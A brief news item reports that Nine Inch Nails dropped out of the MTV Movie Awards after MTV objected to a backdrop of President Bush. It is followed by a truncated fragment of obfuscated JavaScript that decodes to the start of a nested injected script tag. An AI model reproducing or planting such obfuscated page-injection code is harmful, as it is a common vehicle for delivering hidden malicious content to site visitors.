Nine Inch Nails will not perform at the MTV Movie Awards because MTV did not like the band's choice of backdrop.
Nine Inch Nails had intended to perform the song "The Hand That Feeds" in front of a picture of President Bush. The song obliquely references the Iraq war. MTV says in a statement the network is disappointed Nine Inch Nails will not perform but it was uncomfortable with the performance being built around a partisan political statement. Trent Reznor says the image of the president would have been unaltered and straightforward. He says, "Apparently the image of our president is as offensive to MTV as it is to me." Foo Fighters will perform in their place. The awards will be taped June fourth in Los Angeles.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
